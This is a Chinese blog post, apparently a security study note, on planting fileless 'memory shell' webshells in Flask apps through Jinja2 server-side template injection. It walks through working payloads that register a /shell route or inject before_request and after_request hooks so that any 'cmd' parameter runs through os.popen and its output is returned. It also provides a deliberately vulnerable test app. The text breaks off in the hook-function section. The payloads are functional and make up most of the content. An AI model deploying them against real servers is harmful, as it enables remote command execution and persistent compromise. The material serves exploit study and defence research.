<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前置什么是内存马内存马是一种无文件落地的恶意代码。不同于传统的webshell：通常是一个文件。攻击者利用某些中间件的进程执行内存马，从而进行getshell！ flask的内存马又怎么说就是利用flask的ssti漏洞，进行插入内存马！与其说是flask的ssti，不如说是jinja2的，模板引擎是jinja2！ 旧马（flask2.x）payload分析1url_for.__globals__">
<meta property="og:type" content="article">
<meta property="og:title" content="flask下的内存马">
<meta property="og:url" content="https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="Rufeii">
<meta property="og:description" content="前置什么是内存马内存马是一种无文件落地的恶意代码。不同于传统的webshell：通常是一个文件。攻击者利用某些中间件的进程执行内存马，从而进行getshell！ flask的内存马又怎么说就是利用flask的ssti漏洞，进行插入内存马！与其说是flask的ssti，不如说是jinja2的，模板引擎是jinja2！ 旧马（flask2.x）payload分析1url_for.__globals__">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/10/4.png">
<meta property="og:image" content="https://rufeii.github.io/images/achieve/2025/10/5.png">
<meta property="article:published_time" content="2025-10-29T11:12:27.000Z">
<meta property="article:modified_time" content="2025-11-03T08:59:57.227Z">
<meta property="article:author" content="Rufeii">
<meta property="article:tag" content="flask">
<meta property="article:tag" content="内存马">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://rufeii.github.io/images/achieve/2025/10/4.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/website.jpg">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/website.jpg" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/website.jpg">
        
      
    
    <!-- title -->
    <title>flask下的内存马</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0me</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/categories/">categ0ries</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/11/02/%E6%88%90%E9%83%BD%E5%A4%A7%E5%AD%A6%E7%AC%AC%E5%85%AB%E5%B1%8A%E7%8E%84%E6%AD%A6%E6%9D%AF%EF%BC%88ak%EF%BC%89/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/10/26/%E6%98%9F%E9%80%94ctf2025/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&text=flask下的内存马"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=flask下的内存马"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=flask下的内存马&body=Check out this article: https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&title=flask下的内存马"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&name=flask下的内存马&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://rufeii.github.io/2025/10/29/Flask%E4%B8%8B%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/&t=flask下的内存马"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E7%BD%AE"><span class="toc-number">1.</span> <span class="toc-text">前置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">1.1.</span> <span class="toc-text">什么是内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flask%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC%E5%8F%88%E6%80%8E%E4%B9%88%E8%AF%B4"><span class="toc-number">1.2.</span> <span class="toc-text">flask的内存马又怎么说</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%97%A7%E9%A9%AC%EF%BC%88flask2-x%EF%BC%89"><span class="toc-number">2.</span> <span class="toc-text">旧马（flask2.x）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#payload%E5%88%86%E6%9E%90"><span class="toc-number">2.1.</span> <span class="toc-text">payload分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#flask%E8%AF%B7%E6%B1%82%E4%B8%8A%E4%B8%8B%E6%96%87%E6%9C%BA%E5%88%B6"><span class="toc-number">2.1.1.</span> <span class="toc-text">flask请求上下文机制</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0test"><span class="toc-number">2.2.</span> <span class="toc-text">本地test</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%B0%E9%A9%AC%EF%BC%88flask3-x%EF%BC%89"><span class="toc-number">3.</span> <span class="toc-text">新马（flask3.x）</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A3%85%E9%A5%B0%E5%99%A8"><span class="toc-number">3.1.</span> <span class="toc-text">装饰器</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8before-request"><span class="toc-number">3.1.1.</span> <span class="toc-text">利用before_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%A9%E7%94%A8after-request"><span class="toc-number">3.1.2.</span> <span class="toc-text">利用after_request</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#hook%E5%87%BD%E6%95%B0"><span class="toc-number">3.2.</span> <span class="toc-text">hook函数</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#teardown-request"><span class="toc-number">3.2.1.</span> <span class="toc-text">teardown_request</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#errorhandler"><span class="toc-number">3.2.2.</span> <span class="toc-text">errorhandler</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">4.</span> <span class="toc-text">总结</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        flask下的内存马
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Rufeii</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-10-29T11:12:27.000Z" class="dt-published" itemprop="datePublished">2025-10-29</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/python%E5%86%85%E5%AD%98%E9%A9%AC/">python内存马</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/flask/" rel="tag">flask</a>, <a class="p-category" href="/tags/%E5%86%85%E5%AD%98%E9%A9%AC/" rel="tag">内存马</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前置"><a href="#前置" class="headerlink" title="前置"></a>前置</h2><h3 id="什么是内存马"><a href="#什么是内存马" class="headerlink" title="什么是内存马"></a>什么是内存马</h3><p>内存马是一种<strong>无文件落地</strong>的恶意代码。不同于传统的webshell：通常是一个文件。攻击者利用某些中间件的进程执行内存马，从而进行getshell！</p>
<h3 id="flask的内存马又怎么说"><a href="#flask的内存马又怎么说" class="headerlink" title="flask的内存马又怎么说"></a>flask的内存马又怎么说</h3><p>就是利用flask的ssti漏洞，进行插入内存马！与其说是flask的ssti，不如说是jinja2的，模板引擎是jinja2！</p>
<h2 id="旧马（flask2-x）"><a href="#旧马（flask2-x）" class="headerlink" title="旧马（flask2.x）"></a>旧马（flask2.x）</h2><h3 id="payload分析"><a href="#payload分析" class="headerlink" title="payload分析"></a>payload分析</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read())&quot;</span>,&#123;<span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>

<p>我们对pyaload进行逐一分析</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](</span><br><span class="line">    <span class="string">&quot;app.add_url_rule(</span></span><br><span class="line"><span class="string">        &#x27;/shell&#x27;, </span></span><br><span class="line"><span class="string">        &#x27;shell&#x27;, </span></span><br><span class="line"><span class="string">        lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read()</span></span><br><span class="line"><span class="string">    )&quot;</span>,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>先就是找eval用于python代码，当然exec也可以！</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;app.add_url_rule(</span></span><br><span class="line"><span class="string">        &#x27;/shell&#x27;, </span></span><br><span class="line"><span class="string">        &#x27;shell&#x27;, </span></span><br><span class="line"><span class="string">        lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read()</span></span><br><span class="line"><span class="string">    )&quot;</span></span><br></pre></td></tr></table></figure>

<p>app是Flask类的实例，简单来说就是Flask应用本身！</p>
<p>add_url_rule是Flask框架中的一个核心方法，用于手动添加URL路由规则！</p>
<p>我们通过跟进route这个装饰器函数，找到add_url_rule在跟进它，拿到源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">add_url_rule</span>(<span class="params"></span></span><br><span class="line"><span class="params">        self,</span></span><br><span class="line"><span class="params">        rule: <span class="built_in">str</span>,</span></span><br><span class="line"><span class="params">        endpoint: <span class="built_in">str</span> | <span class="literal">None</span> = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">        view_func: ft.RouteCallable | <span class="literal">None</span> = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">        provide_automatic_options: <span class="built_in">bool</span> | <span class="literal">None</span> = <span class="literal">None</span>,</span></span><br><span class="line"><span class="params">        **options: t.<span class="type">Any</span>,</span></span><br><span class="line"><span class="params">    </span>)</span><br></pre></td></tr></table></figure>

<p>主要就是看三个参数</p>
<ul>
<li>rule：函数对应的<code>URL</code>规则, 满足条件和<code>app.route</code>的第一个参数一样, 必须以<code>/</code>开头</li>
<li>endpoint：路由的端点名称，是一个标识符，用于在 Flask 内部引用这个路由。说白了就是一个函数名</li>
<li>view_func：处理这个路由请求的视图函数，当客户端访问这个路径时，会调用这个函数。</li>
</ul>
<p>接下来就看调用的这个函数了</p>
<p>lambda是一个无名函数，:后面是一个表达式用于实现函数的功能！这里就是导入命令函数，那么<code>_request_ctx_stack.top</code>这个又是什么玩意？</p>
<h4 id="flask请求上下文机制"><a href="#flask请求上下文机制" class="headerlink" title="flask请求上下文机制"></a>flask请求上下文机制</h4><blockquote>
<p>当网页请求进入<code>Flask</code>时, 会实例化一个<code>Request Context</code>. 在<code>Python</code>中分出了两种上下文: 请求上下文(request context)、应用上下文(session context). 一个请求上下文中封装了请求的信息, 而上下文的结构是运用了一个<code>Stack</code>的栈结构, 也就是说它拥有一个栈所拥有的全部特性. <code>request context</code>实例化后会被<code>push</code>到栈<code>_request_ctx_stack</code>中, 基于此特性便可以通过获取栈顶元素的方法来获取当前的请求.</p>
</blockquote>
<p>那么说白了就是请求的储存的结构式栈结构，后进先出，然后通过<code>_request_ctx_stack.top</code>获取栈顶元素也就是最新请求！</p>
<p>那么这里我们就明白了</p>
<p><code>_request_ctx_stack.top.request.args.get(&#39;cmd&#39;,&#39;whoami&#39;)</code>就是获得请求的cmd参数，默认值是whoami</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">        <span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>eval的第二个参数是个字典用于声明里面的全局变量，用来指定<code>exec()</code> 或 <code>eval()</code> 的<strong>第一个参数（即要执行的代码字符串）中引用的、但并未在代码字符串内部定义</strong>的那些变量</p>
<p>到这整个pyload就分析完了</p>
<h3 id="本地test"><a href="#本地test" class="headerlink" title="本地test"></a>本地test</h3><p>首先安装</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip install flask==<span class="number">2</span>.<span class="number">0</span>.<span class="number">0</span></span><br><span class="line">pip install werkzeug==<span class="number">2</span>.<span class="number">0</span>.<span class="number">0</span></span><br></pre></td></tr></table></figure>

<p>接下来就是运行脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template_string</span><br><span class="line"></span><br><span class="line">app=Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>,methods=[<span class="string">&#x27;GET&#x27;</span>,<span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    template=<span class="string">&#x27;&#x27;&#x27; </span></span><br><span class="line"><span class="string">    &lt;p&gt;Hello %s &lt;/p&gt;&#x27;&#x27;&#x27;</span>%(request.args.get(<span class="string">&#x27;name&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template_string(template)      <span class="comment"># 渲染为html内容</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:          <span class="comment"># 如果作为脚本运行，而不是被当成模块导入</span></span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>打入内存马，进行命令执行</p>
<p><img src="/images/achieve/2025/10/4.png"></p>
<p>成功非常nice！</p>
<h2 id="新马（flask3-x）"><a href="#新马（flask3-x）" class="headerlink" title="新马（flask3.x）"></a>新马（flask3.x）</h2><p>为啥新版本的不行？主要是报错</p>
<figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">AssertionError: <span class="title">The</span> <span class="title">setup</span> <span class="title">method</span> &#x27;<span class="title">add_url_rule</span>&#x27; <span class="title">can</span> <span class="title">no</span> <span class="title">longer</span> <span class="title">be</span> <span class="title">called</span> <span class="title">on</span> <span class="title">the</span> <span class="title">application</span>. <span class="title">It</span> <span class="title">has</span> <span class="title">already</span> <span class="title">handled</span> <span class="title">its</span> <span class="title">first</span> <span class="title">request</span>, <span class="title">any</span> <span class="title">changes</span> <span class="title">will</span> <span class="title">not</span> <span class="title">be</span> <span class="title">applied</span> <span class="title">consistently</span>.</span></span><br></pre></td></tr></table></figure>

<p>在应用启动之后说是不能用add_url_rule进行添加路由！</p>
<h3 id="装饰器"><a href="#装饰器" class="headerlink" title="装饰器"></a>装饰器</h3><p>什么是装饰器？</p>
<p>装饰器是一种用于<strong>修改或增强函数或方法行为</strong>的高级函数。装饰器本质上是一个接受函数作为参数并返回一个新函数的函数。</p>
<h4 id="利用before-request"><a href="#利用before-request" class="headerlink" title="利用before_request"></a>利用before_request</h4><p>before_request 方法允许我们在每个请求之前执行一些操作,跟进它</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">before_request</span>(<span class="params">self, f: T_before_request</span>) -&gt; T_before_request:</span><br><span class="line">    <span class="variable language_">self</span>.before_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">    <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p><code>self.before_request_funcs</code> 是 Flask 应用对象中的一个属性。它是一个 <strong>字典</strong>，用于存储在请求处理之前需要执行的钩子函数。</p>
<p><code>setdefault(None,[]).append(f)</code>这个其实就是用来增加新的钩子函数的！那么我们插入lambda:<strong>import</strong>(‘os’).popen(_request_ctx_stack.top.request.args.get(‘cmd’, ‘whoami’)).read()</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.before_request_funcs.setdefault(None, []).append(lambda:__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read())&quot;</span>,&#123;<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>

<p>如果不定义字典也可以去sys.modules里面去找</p>
<blockquote>
<p>sys.modules是一个全局字典，该字典是python启动后就加载在内存中。每当程序员导入新的模块，sys.modules都将记录这些模块。字典sys.modules对于加载模块起到了缓冲的作用。当某个模块第一次导入，字典sys.modules将自动记录该模块。当第二次再导入该模块时，python会直接到字典中查找，从而加快了程序运行的速度</p>
</blockquote>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda:__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read())&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>当然找app这个对象的方法不绝对，随机应变即可</p>
<p>这个payload的缺点就是只能用一次，毕竟你打入之后每次请求之前就会执行我们插入的lambda函数！</p>
<h4 id="利用after-request"><a href="#利用after-request" class="headerlink" title="利用after_request"></a>利用after_request</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">after_request</span>(<span class="params">self, f</span>):</span><br><span class="line">    <span class="variable language_">self</span>.after_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">    <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p>先自己整一整</p>
<figure class="highlight tex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url<span class="built_in">_</span>for.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;<span class="built_in">_</span><span class="built_in">_</span>builtins<span class="built_in">_</span><span class="built_in">_</span>&#x27;][&#x27;eval&#x27;](&quot;app.after<span class="built_in">_</span>request<span class="built_in">_</span>funcs.setdefault(None, []).append(lambda:<span class="built_in">_</span><span class="built_in">_</span>import<span class="built_in">_</span><span class="built_in">_</span>(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read())&quot;,&#123;&#x27;app&#x27;:url<span class="built_in">_</span>for.<span class="built_in">_</span><span class="built_in">_</span>globals<span class="built_in">_</span><span class="built_in">_</span>[&#x27;current<span class="built_in">_</span>app&#x27;]&#125;)&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>为什么不行（在before_request的基础上改），打入进去之后每次请求之后就会就是执行我们的函数，但是这不是响应啊哥们</p>
<p>来分析正确的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get(&#x27;cmd&#x27;) and exec(\&quot;global CmdResp;CmdResp=__import__(\&#x27;flask\&#x27;).make_response(__import__(\&#x27;os\&#x27;).popen(request.args.get(\&#x27;cmd\&#x27;)).read())\&quot;)==None else resp)&quot;</span>,&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>



<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    app.after_request_funcs.setdefault(None, []).append(</span></span><br><span class="line"><span class="string">        lambda resp: CmdResp if request.args.get(&#x27;cmd&#x27;) and exec(</span></span><br><span class="line"><span class="string">            \&quot;\&quot;\&quot;</span></span><br><span class="line"><span class="string">            global CmdResp;</span></span><br><span class="line"><span class="string">            CmdResp = __import__(&#x27;flask&#x27;).make_response(</span></span><br><span class="line"><span class="string">                __import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()</span></span><br><span class="line"><span class="string">            )</span></span><br><span class="line"><span class="string">            \&quot;\&quot;\&quot;</span></span><br><span class="line"><span class="string">        ) == None else resp</span></span><br><span class="line"><span class="string">    )</span></span><br><span class="line"><span class="string">    &#x27;&#x27;&#x27;</span>,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="string">&#x27;request&#x27;</span>: url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>: url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p><code>resp</code> 代表 Response Object (响应对象)就是原来的响应！<code>__import__(&#39;flask&#39;).make_response()</code>这里就可看到是需要调用make_response()这个函数来生成新的响应内容的</p>
<p><img src="/images/achieve/2025/10/5.png"></p>
<p>这个就爽多了！</p>
<h3 id="hook函数"><a href="#hook函数" class="headerlink" title="hook函数"></a>hook函数</h3><p>这个上面就用到了，插入的就是我们定义的钩子函数</p>
<blockquote>
